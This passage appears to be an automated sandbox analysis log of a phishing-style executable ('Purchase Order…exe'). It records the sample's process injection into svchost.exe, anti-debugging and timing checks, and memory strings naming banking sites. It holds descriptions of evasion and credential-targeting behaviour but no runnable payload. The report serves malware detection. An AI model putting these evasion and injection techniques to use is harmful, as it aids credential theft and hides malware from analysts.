            Source: RMActivate_ssp.exe, 00000004.00000002.3886865804.0000000000582000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
            Source: 7466H3538.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 7466H3538.4.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 7466H3538.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 7466H3538.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E rdtsc 2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417A93 LdrLoadDll,2_2_00417A93
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AE703C BlockInput,0_2_00AE703C
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00A9374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,0_2_00A9374E
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AC46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00AC46D0
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AF20F6 LoadLibraryA,GetProcAddress,0_2_00AF20F6
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_013BD408 mov eax, dword ptr fs:[00000030h]0_2_013BD408
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_013BD468 mov eax, dword ptr fs:[00000030h]0_2_013BD468
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_013BBE08 mov eax, dword ptr fs:[00000030h]0_2_013BBE08
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]2_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]2_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B663FF mov eax, dword ptr fs:[00000030h]2_2_03B663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov ecx, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]2_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]2_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC3CD mov eax, dword ptr fs:[00000030h]2_2_03BEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB63C0 mov eax, dword ptr fs:[00000030h]2_2_03BB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0634F mov eax, dword ptr fs:[00000030h]2_2_03C0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C310 mov ecx, dword ptr fs:[00000030h]2_2_03B2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50310 mov ecx, dword ptr fs:[00000030h]2_2_03B50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD437C mov eax, dword ptr fs:[00000030h]2_2_03BD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov ecx, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov ecx, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA352 mov eax, dword ptr fs:[00000030h]2_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD8350 mov ecx, dword ptr fs:[00000030h]2_2_03BD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]2_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]2_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C062D6 mov eax, dword ptr fs:[00000030h]2_2_03C062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]2_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]2_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2823B mov eax, dword ptr fs:[00000030h]2_2_03B2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0625D mov eax, dword ptr fs:[00000030h]2_2_03C0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2826B mov eax, dword ptr fs:[00000030h]2_2_03B2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A250 mov eax, dword ptr fs:[00000030h]2_2_03B2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36259 mov eax, dword ptr fs:[00000030h]2_2_03B36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]2_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]2_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB8243 mov eax, dword ptr fs:[00000030h]2_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB8243 mov ecx, dword ptr fs:[00000030h]2_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C061E5 mov eax, dword ptr fs:[00000030h]2_2_03C061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B70185 mov eax, dword ptr fs:[00000030h]2_2_03B70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]2_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]2_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B601F8 mov eax, dword ptr fs:[00000030h]2_2_03B601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60124 mov eax, dword ptr fs:[00000030h]2_2_03B60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]2_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]2_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov ecx, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF0115 mov eax, dword ptr fs:[00000030h]2_2_03BF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C156 mov eax, dword ptr fs:[00000030h]2_2_03B2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC8158 mov eax, dword ptr fs:[00000030h]2_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov ecx, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov eax, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B280A0 mov eax, dword ptr fs:[00000030h]2_2_03B280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC80A8 mov eax, dword ptr fs:[00000030h]2_2_03BC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3208A mov eax, dword ptr fs:[00000030h]2_2_03B3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03B2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B720F0 mov ecx, dword ptr fs:[00000030h]2_2_03B720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03B2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B380E9 mov eax, dword ptr fs:[00000030h]2_2_03B380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB60E0 mov eax, dword ptr fs:[00000030h]2_2_03BB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB20DE mov eax, dword ptr fs:[00000030h]2_2_03BB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6030 mov eax, dword ptr fs:[00000030h]2_2_03BC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A020 mov eax, dword ptr fs:[00000030h]2_2_03B2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C020 mov eax, dword ptr fs:[00000030h]2_2_03B2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4000 mov ecx, dword ptr fs:[00000030h]2_2_03BB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C073 mov eax, dword ptr fs:[00000030h]2_2_03B5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32050 mov eax, dword ptr fs:[00000030h]2_2_03B32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6050 mov eax, dword ptr fs:[00000030h]2_2_03BB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B307AF mov eax, dword ptr fs:[00000030h]2_2_03B307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE47A0 mov eax, dword ptr fs:[00000030h]2_2_03BE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD678E mov eax, dword ptr fs:[00000030h]2_2_03BD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
